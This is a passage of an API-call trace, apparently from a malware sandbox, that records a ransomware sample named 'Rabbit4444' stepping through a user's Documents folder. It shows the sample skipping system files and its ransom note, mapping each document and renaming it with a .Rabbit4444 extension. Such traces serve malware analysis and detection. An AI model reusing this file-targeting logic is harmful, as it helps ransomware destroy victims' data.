returned 1 [0049.566] CloseHandle (hObject=0x278) returned 1 [0049.567] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc1e0520, ftCreationTime.dwHighDateTime=0x1d4ce48, ftLastAccessTime.dwLowDateTime=0xbe2bf7e0, ftLastAccessTime.dwHighDateTime=0x1d52951, ftLastWriteTime.dwLowDateTime=0xbe2bf7e0, ftLastWriteTime.dwHighDateTime=0x1d52951, nFileSizeHigh=0x0, nFileSizeLow=0x1501f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NmNfuGn Py.pptx", cAlternateFileName="NMNFUG~1.PPT")) returned 1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="Rabbit4444.exe") returned -1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2=".") returned 1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="..") returned 1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="windows") returned -1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="bootmgr") returned 1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="pagefile.sys") returned -1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="boot") returned 1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="ids.txt") returned 1 [0049.567] lstrcmpiW (lpString1="NmNfuGn Py.pptx", lpString2="NTUSER.DAT") returned -1 [0049.567] lstrcpyW (in: lpString1=0x130eb6c, lpString2="NmNfuGn Py.pptx" | out: lpString1="NmNfuGn Py.pptx") returned="NmNfuGn Py.pptx" [0049.567] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NmNfuGn Py.pptx", dwFileAttributes=0x0) returned 1 [0049.568] lstrlenW (lpString="NmNfuGn Py.pptx") returned 15 [0049.568] lstrlenW (lpString="Rabbit4444") returned 10 [0049.568] lstrcmpiW (lpString1="Gn Py.pptx", lpString2="Rabbit4444") returned -1 [0049.568] lstrlenW (lpString=".dll") returned 4 [0049.568] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0049.568] lstrlenW (lpString=".lnk") returned 4 [0049.568] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0049.568] lstrlenW (lpString=".ini") returned 4 [0049.568] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0049.568] lstrlenW (lpString=".sys") returned 4 [0049.568] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0049.568] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NmNfuGn Py.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nmnfugn py.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.568] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.568] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14087882510) returned 1 [0049.568] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=86047) returned 1 [0049.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0049.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0049.568] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15320, lpName=0x0) returned 0x298 [0049.568] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15320) returned 0x70000 [0049.570] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.570] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.571] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14088166619) returned 1 [0049.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0049.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0049.571] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.572] CloseHandle (hObject=0x298) returned 1 [0049.572] CloseHandle (hObject=0x278) returned 1 [0049.573] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\NmNfuGn Py.pptx.Rabbit4444") returned 52 [0049.573] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\NmNfuGn Py.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nmnfugn py.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\NmNfuGn Py.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\nmnfugn py.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0049.573] InterlockedExchangeAdd (in: Addend=0xff618, Value=86048 | out: Addend=0xff618) returned 22139696 [0049.573] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3618 [0049.573] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd80487f0, ftCreationTime.dwHighDateTime=0x1d4ca5a, ftLastAccessTime.dwLowDateTime=0xf0134fd0, ftLastAccessTime.dwHighDateTime=0x1d4d0c1, ftLastWriteTime.dwLowDateTime=0xf0134fd0, ftLastWriteTime.dwHighDateTime=0x1d4d0c1, nFileSizeHigh=0x0, nFileSizeLow=0xa91a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o-SO_hvBok5gl9ouLbt.pdf", cAlternateFileName="O-SO_H~1.PDF")) returned 1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="Rabbit4444.exe") returned -1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2=".") returned 1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="..") returned 1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="windows") returned -1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="bootmgr") returned 1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="pagefile.sys") returned -1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="boot") returned 1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="ids.txt") returned 1 [0049.573] lstrcmpiW (lpString1="o-SO_hvBok5gl9ouLbt.pdf", lpString2="NTUSER.DAT") returned 1 [0049.573] lstrcpyW (in: lpString1=0x130eb6c, lpString2="o-SO_hvBok5gl9ouLbt.pdf" | out: lpString1="o-SO_hvBok5gl9ouLbt.pdf") returned="o-SO_hvBok5gl9ouLbt.pdf" [0049.573] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\o-SO_hvBok5gl9ouLbt.pdf", dwFileAttributes=0x0) returned 1 [0049.574] lstrlenW (lpString="o-SO_hvBok5gl9ouLbt.pdf") returned 23 [0049.574] lstrlenW (lpString="Rabbit4444") returned 10 [0049.574] lstrcmpiW (lpString1="9ouLbt.pdf", lpString2="Rabbit4444") returned -1 [0049.574] lstrlenW (lpString=".dll") returned 4 [0049.574] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.574] lstrlenW (lpString=".lnk") returned 4 [0049.574] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0049.574] lstrlenW (lpString=".ini") returned 4 [0049.574] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.574] lstrlenW (lpString=".sys") returned 4 [0049.574] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0049.574] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\o-SO_hvBok5gl9ouLbt.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\o-so_hvbok5gl9oulbt.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.574] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.574] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14088483694) returned 1 [0049.574] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=43290) returned 1 [0049.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0049.574] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xac20, lpName=0x0) returned 0x298 [0049.574] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xac20) returned 0x70000 [0049.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.576] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14088691012) returned 1 [0049.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0049.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0049.576] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.577] CloseHandle (hObject=0x298) returned 1 [0049.577] CloseHandle (hObject=0x278) returned 1 [0049.579] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\o-SO_hvBok5gl9ouLbt.pdf.Rabbit4444") returned 60 [0049.579] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\o-SO_hvBok5gl9ouLbt.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\o-so_hvbok5gl9oulbt.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\o-SO_hvBok5gl9ouLbt.pdf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\o-so_hvbok5gl9oulbt.pdf.rabbit4444"), dwFlags=0x1) returned 1 [0049.580] InterlockedExchangeAdd (in: Addend=0xff618, Value=43296 | out: Addend=0xff618) returned 22225744 [0049.580] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3620 [0049.580] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x181f90a0, ftCreationTime.dwHighDateTime=0x1d4d906, ftLastAccessTime.dwLowDateTime=0x689540, ftLastAccessTime.dwHighDateTime=0x1d4b51d, ftLastWriteTime.dwLowDateTime=0x689540, ftLastWriteTime.dwHighDateTime=0x1d4b51d, nFileSizeHigh=0x0, nFileSizeLow=0xc284, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oU6X5HPu8.docx", cAlternateFileName="OU6X5H~1.DOC")) returned 1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="Rabbit4444.exe") returned -1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2=".") returned 1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="..") returned 1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="windows") returned -1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="bootmgr") returned 1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="pagefile.sys") returned -1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="boot") returned 1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="ids.txt") returned 1 [0049.580] lstrcmpiW (lpString1="oU6X5HPu8.docx", lpString2="NTUSER.DAT") returned 1 [0049.580] lstrcpyW (in: lpString1=0x130eb6c, lpString2="oU6X5HPu8.docx" | out: lpString1="oU6X5HPu8.docx") returned="oU6X5HPu8.docx" [0049.580] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oU6X5HPu8.docx", dwFileAttributes=0x0) returned 1 [0049.581] lstrlenW (lpString="oU6X5HPu8.docx") returned 14 [0049.581] lstrlenW (lpString="Rabbit4444") returned 10 [0049.581] lstrcmpiW (lpString1="5HPu8.docx", lpString2="Rabbit4444") returned -1 [0049.581] lstrlenW (lpString=".dll") returned 4 [0049.581] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0049.581] lstrlenW (lpString=".lnk") returned 4 [0049.581] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0049.581] lstrlenW (lpString=".ini") returned 4 [0049.581] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0049.581] lstrlenW (lpString=".sys") returned 4 [0049.581] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0049.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oU6X5HPu8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ou6x5hpu8.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.581] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.581] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14089177905) returned 1 [0049.581] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=49796) returned 1 [0049.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0049.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101a68 [0049.581] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc590, lpName=0x0) returned 0x298 [0049.581] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc590) returned 0x70000 [0049.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.583] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14089389691) returned 1 [0049.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0049.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101a68 | out: hHeap=0xe0000) returned 1 [0049.583] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.584] CloseHandle (hObject=0x298) returned 1 [0049.584] CloseHandle (hObject=0x278) returned 1 [0049.585] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\oU6X5HPu8.docx.Rabbit4444") returned 51 [0049.585] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\oU6X5HPu8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ou6x5hpu8.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\oU6X5HPu8.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\ou6x5hpu8.docx.rabbit4444"), dwFlags=0x1) returned 1 [0049.585] InterlockedExchangeAdd (in: Addend=0xff618, Value=49808 | out: Addend=0xff618) returned 22269040 [0049.585] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3622 [0049.585] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa87f514a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddc1fe1e, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2="Rabbit4444.exe") returned -1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2=".") returned 1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2="..") returned 1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2="windows") returned -1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2="bootmgr") returned 1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2="pagefile.sys") returned -1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2="boot") returned 1 [0049.585] lstrcmpiW (lpString1="Outlook Files", lpString2="ids.txt") returned 1 [0049.586] lstrcmpiW (lpString1="Outlook Files", lpString2="NTUSER.DAT") returned 1 [0049.586] lstrcpyW (in: lpString1=0x130eb6c, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0049.586] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0049.586] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x50) returned 0x10d3f8 [0049.586] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6390 [0049.586] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a08bf60, ftCreationTime.dwHighDateTime=0x1d4cb4b, ftLastAccessTime.dwLowDateTime=0xc2e260a0, ftLastAccessTime.dwHighDateTime=0x1d4f051, ftLastWriteTime.dwLowDateTime=0xc2e260a0, ftLastWriteTime.dwHighDateTime=0x1d4f051, nFileSizeHigh=0x0, nFileSizeLow=0x18f84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p7hRtqlqwGh-7qLSqxAb.pptx", cAlternateFileName="P7HRTQ~1.PPT")) returned 1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="Rabbit4444.exe") returned -1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2=".") returned 1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="..") returned 1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="windows") returned -1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="bootmgr") returned 1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="pagefile.sys") returned -1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="boot") returned 1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="ids.txt") returned 1 [0049.586] lstrcmpiW (lpString1="p7hRtqlqwGh-7qLSqxAb.pptx", lpString2="NTUSER.DAT") returned 1 [0049.586] lstrcpyW (in: lpString1=0x130eb6c, lpString2="p7hRtqlqwGh-7qLSqxAb.pptx" | out: lpString1="p7hRtqlqwGh-7qLSqxAb.pptx") returned="p7hRtqlqwGh-7qLSqxAb.pptx" [0049.586] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\p7hRtqlqwGh-7qLSqxAb.pptx", dwFileAttributes=0x0) returned 1 [0049.586] lstrlenW (lpString="p7hRtqlqwGh-7qLSqxAb.pptx") returned 25 [0049.586] lstrlenW (lpString="Rabbit4444") returned 10 [0049.586] lstrcmpiW (lpString1="SqxAb.pptx", lpString2="Rabbit4444") returned 1 [0049.586] lstrlenW (lpString=".dll") returned 4 [0049.586] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0049.586] lstrlenW (lpString=".lnk") returned 4 [0049.586] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0049.586] lstrlenW (lpString=".ini") returned 4 [0049.586] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0049.586] lstrlenW (lpString=".sys") returned 4 [0049.586] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0049.587] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\p7hRtqlqwGh-7qLSqxAb.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\p7hrtqlqwgh-7qlsqxab.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.587] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.587] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14089741046) returned 1 [0049.587] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=102276) returned 1 [0049.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0049.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0049.587] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19290, lpName=0x0) returned 0x298 [0049.587] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19290) returned 0x70000 [0049.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.590] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14090086055) returned 1 [0049.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0049.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0049.590] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.591] CloseHandle (hObject=0x298) returned 1 [0049.591] CloseHandle (hObject=0x278) returned 1 [0049.592] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\p7hRtqlqwGh-7qLSqxAb.pptx.Rabbit4444") returned 62 [0049.592] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\p7hRtqlqwGh-7qLSqxAb.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\p7hrtqlqwgh-7qlsqxab.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\p7hRtqlqwGh-7qLSqxAb.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\p7hrtqlqwgh-7qlsqxab.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0049.593] InterlockedExchangeAdd (in: Addend=0xff618, Value=102288 | out: Addend=0xff618) returned 22318848 [0049.593] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3624 [0049.593] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dbc3620, ftCreationTime.dwHighDateTime=0x1d4d419, ftLastAccessTime.dwLowDateTime=0x94582fa0, 